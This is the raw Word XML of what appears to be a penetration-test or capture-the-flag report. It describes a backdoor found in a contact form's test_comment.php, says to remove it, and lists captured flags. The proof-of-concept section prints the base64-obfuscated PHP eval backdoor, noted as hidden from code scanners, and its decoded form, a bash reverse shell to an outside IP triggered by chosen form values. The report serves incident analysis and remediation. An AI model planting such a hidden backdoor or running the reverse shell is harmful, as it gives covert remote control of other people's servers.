            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>http://contact.vese.com/test_comment.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="413" w:hRule="atLeast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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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</w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>The following command permits to create a backdoor if specific input value are provided into the input form. The command is base64 encoded in order to be skipped by SAST and DAST scan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>eval(base64_decode('Ly80MjZjZTkyOWVhMDUxMjg1ZTU1MWVhZjJiMmRlMmJmNDYzYWU3ODQ1NmZhM2I2NGFkYjVmZDIyMTRkOTg1ZTM0CmlmICgkbmFtZSA9PSAidGVzdDEiICYmICRlbWFpbCA9PSAidGVzdEB0ZXN0LmNvbSIgJiYgJG1lc3NhZ2UgPT0gInRlc3QyIil7CiAgICBzeXN0ZW0oImJhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTU4LjQ2LjI1MC4xNTEvOTAwMSAwPiYxJyIpOwp9'));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>decoding it, the executed command is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>if ($name == "test1" &amp;&amp; $email == "test@test.com" &amp;&amp; $message == "test2"){</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>system("bash -c 'bash -i &gt;&amp; /dev/tcp/158.46.250.151/9001 0&gt;&amp;1'");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">it means providing test1, </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>test@test.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and test2 values will give a reverse shell against 158.46.250.151 on port 9001, probably this is the way the attacker used to persists on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-793" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>dev</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Remove the line from the test_comment.php file</w:t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</w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc119432378"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploitation Paths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FLAGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_PSEUTERM_COIN_256579}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{FLAG_INTWEBSI_IHAL_421571}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="false"/>
          <w:b/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="" w:cs="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr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entury Gothic">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri Light">
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Franklin Gothic Book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Roboto">
    <w:altName w:val="sans-serif"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Roboto">
    <w:altName w:val="apple-system"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Mallory">
    <w:altName w:val="Verdana"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="SFMono-Regular">
    <w:altName w:val="Consolas"/>
    <w:charset w:val="01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bd0b0f"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo2Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f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Car" w:customStyle="1">
    <w:name w:val="Título Car"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Ttulo"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo1Car" w:customStyle="1">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00bd0b0f"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo2Car" w:customStyle="1">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Ttulo2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f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f1064"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:fill="E1DFDD" w:val="clear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itle">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TtuloCar"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TitlePageVersion" w:customStyle="1">
    <w:name w:val="Title Page - Version"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents1">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="10070" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:b/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents3">
    <w:name w:val="TOC 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="10070" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="60"/>
      <w:ind w:left="403" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="100"/>
      <w:ind w:left="200" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Spacer" w:customStyle="1">
    <w:name w:val="*Spacer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="12"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyBlockLabelnonTOC" w:customStyle="1">
    <w:name w:val="*Body Block Label (non TOC)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableTextSmall" w:customStyle="1">
    <w:name w:val="Table Text - Small"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableHeaderText" w:customStyle="1">
    <w:name w:val="Table - Header Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyBlockLine" w:customStyle="1">
    <w:name w:val="*Body Block Line"/>
    <w:basedOn w:val="Spacer"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:spacing w:before="0" w:after="120"/>
      <w:ind w:left="1620" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="auto"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Finding" w:customStyle="1">
    <w:name w:val="*Finding"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:eastAsia="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FindingTableLabel" w:customStyle="1">
    <w:name w:val="*Finding Table Label"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00bd0b0f"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
